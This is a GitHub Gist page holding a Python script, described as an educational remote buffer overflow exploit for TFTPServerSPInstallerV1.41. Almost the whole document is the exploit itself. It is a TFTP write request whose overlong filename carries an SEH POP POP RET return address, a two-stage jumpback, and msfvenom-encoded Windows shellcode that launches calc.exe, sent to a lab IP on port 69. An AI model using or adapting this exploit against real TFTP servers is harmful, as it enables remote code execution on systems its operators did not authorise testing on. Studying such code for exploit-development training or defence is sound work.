Last active
May 30, 2018 08:57
-
-
Save r00tpgp/b5004a005d75592fa73a3ee1ef5ba8cf to your computer and use it in GitHub Desktop.
Remote BoF for TFTPServerSPInstallerV1.41
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Remote BoF for TFTPServerSPInstallerV1.41. | |
# Dev/Modified by r00tpgp for educational purposes, taken off orginal tftpd exploit by muts | |
# | |
import socket | |
import sys | |
host = '172.16.155.129' | |
port = 69 | |
try: | |
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) | |
except: | |
print "socket() failed" | |
sys.exit(1) | |
# This is the original offset size 1496. Kept commented for reference. | |
#filename = "A" * 1496 + "\x4F\x48\x40" # + "\x43" * 3500 # 0040484F POP POP RET | |
# Evil shellcode. Pop a calculator! | |
#msfvenom -p windows/exec cmd=calc.exe EXITFUNC=seh -e x86/shikata_ga_nai -b "\x00\x2f" -f python | |
#Payload size: 220 bytes | |
buf = "" | |
buf += "\xbb\xf3\x84\xd0\x15\xdb\xdb\xd9\x74\x24\xf4\x5a\x29" | |
buf += "\xc9\xb1\x31\x31\x5a\x13\x83\xea\xfc\x03\x5a\xfc\x66" | |
buf += "\x25\xe9\xea\xe5\xc6\x12\xea\x89\x4f\xf7\xdb\x89\x34" | |
buf += "\x73\x4b\x3a\x3e\xd1\x67\xb1\x12\xc2\xfc\xb7\xba\xe5" | |
buf += "\xb5\x72\x9d\xc8\x46\x2e\xdd\x4b\xc4\x2d\x32\xac\xf5" | |
buf += "\xfd\x47\xad\x32\xe3\xaa\xff\xeb\x6f\x18\x10\x98\x3a" | |
buf += "\xa1\x9b\xd2\xab\xa1\x78\xa2\xca\x80\x2e\xb9\x94\x02" | |
buf += "\xd0\x6e\xad\x0a\xca\x73\x88\xc5\x61\x47\x66\xd4\xa3" | |
buf += "\x96\x87\x7b\x8a\x17\x7a\x85\xca\x9f\x65\xf0\x22\xdc" | |
buf += "\x18\x03\xf1\x9f\xc6\x86\xe2\x07\x8c\x31\xcf\xb6\x41" | |
buf += "\xa7\x84\xb4\x2e\xa3\xc3\xd8\xb1\x60\x78\xe4\x3a\x87" | |
buf += "\xaf\x6d\x78\xac\x6b\x36\xda\xcd\x2a\x92\x8d\xf2\x2d" | |
buf += "\x7d\x71\x57\x25\x93\x66\xea\x64\xf9\x79\x78\x13\x4f" | |
buf += "\x79\x82\x1c\xff\x12\xb3\x97\x90\x65\x4c\x72\xd5\x94" | |
buf += "\xbd\x4f\xc3\x01\x64\x3a\xae\x4f\x97\x90\xec\x69\x14" | |
buf += "\x11\x8c\x8d\x04\x50\x89\xca\x82\x88\xe3\x43\x67\xaf" | |
buf += "\x50\x63\xa2\xcc\x37\xf7\x2e\x3d\xd2\x7f\xd4\x41" | |
# Jumpback shellcode from phrack 62 article 7. | |
jumpback = "\xd9\xee\xd9\x74\x24\xf4\x59\x80\xc1\x0a\x90\xfe\xcd\xfe\xcd\xff\xe1" | |
# Sending of staged shellcode. Read from right to left. | |
# Ret addr(POP POP RET) ---> 1st stage shell short jump ------> 2nd stage long jumback shellcode ---> evil buf | |
filename = "\xcc" * 973 + "\x90" * 252 + buf + "\x90" * 30 + jumpback + "\xeb\xd0\x90\x90" + "\x4F\x48\x40" | |
# Send payload off | |
mode = "netascii" | |
payload = "\x00\x02" + filename + "\x00" + mode+ "\0" | |
s.sendto(payload, (host, port)) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment